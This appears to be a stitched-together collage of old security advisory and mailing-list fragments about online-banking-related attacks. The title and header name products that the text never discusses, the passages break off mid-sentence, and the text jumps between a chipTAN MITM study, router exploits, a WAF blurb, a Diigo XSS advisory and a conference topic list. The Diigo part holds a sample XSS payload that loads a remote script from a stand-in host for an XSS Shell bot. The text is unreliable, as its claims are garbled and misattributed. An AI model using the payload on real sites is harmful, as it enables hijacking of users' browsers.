Title:
======
eBank IT Online Banking - Multiple Web Vulnerabilities
Date:
=====
2012-01-26
#########################################################################
W2B Online Banking Remote File Inclusion Vulnerability
#########################################################################
## AUTHOR: THuM4N
## Email : Win32.exe@w.cn
## Script : W2B Online Banking
Abstract
========
ChipTAN comfort is a new system which is supposed to securely authorise online
banking transactions by means of a trusted device. It is assumed that chipTAN
comfort specifically protects against man-in-the-middle attacks. Such attacks are
currently putting bank customers who are using the iTAN system at risk. RedTeam
Pentesting examined chipTAN comfort and showed that even when using this
system, man-in-the-middle attacks can compromise online banking security.
router's page. This means the harm an exploit can do is limited only by
the attacker's imagination. Other examples of evil attacks include
eavesdropping on VoIP conversations (change the 'sip config primproxyaddr'
statement in the config file), stealing VoIP credentials, exposing
internal hosts on the DMZ, changing the DNS settings to steal online
banking credentials, disabling auto updates (change the 'cwmp.ini' section
in the config file), etc …
The only requirement for the router to be owned is that a victim user
visits a (malicious) website. The good news is that our exploits do
NOT require knowledge of the admin password! How can that be? Well, we
Product Description
---------------------------------------
phion's web application firewall (WAF) airlock provides a unique
combination of protective mechanisms for web applications. Whether you
want to observe PCI DSS, safeguard online banking or protect e-commerce
applications: airlock ensures sustained and manageable web application
security.
[Source: http://www.phion.com/INT/products/websecurity/Pages/default.aspx]
The target URL can be over SSL as well. All Diigo tools users are affected
by this vulnerability.
For an attacker this is a perfect opportunity to use an XSS bot
manager application such as XSS Shell. An attacker can also attack
high-profile websites such as online banking applications: since
shared bookmarks are searchable, you can actually find people who use
a certain online banking application.
A sample attack comment could be:
<script src="http://example.com/xssshell/"></script>
> certificate (at least the CN which yells the difference) then he
> probably asked for it.
The Web is used by close to a billion people who do not necessarily check
the details of SSL certs, or inspect all HTTP headers, on *every single*
login to their webmail or online banking site.
We may perhaps blame them if they click through clear and concise security
warnings, or subvert other measures, and willingly consent to an
unnecessary risk - but when they rely on the expertise of browser vendors
to know that something is wrong, and get burned - well, it's not their
https://deepsec.net/schedule/
The topics include social engineering, security of the GSM air interface,
design of secure protocols, physical security, Web 2.0, exploit/malware
analysis & design, security awareness, abusing device drivers, #twitter
risks, attacks on smart-card secured online banking, security risks and
defence for developers, advanced database exploits, abusing firmware,
security analysis of the TCP & IP protocols, key management, incident
response, e-voting, advanced keyboard sniffing, malware for routers,
large-scale network attack simulation, cloud computing, next generation
intrusion detection/prevention, among others. We also show a demonstration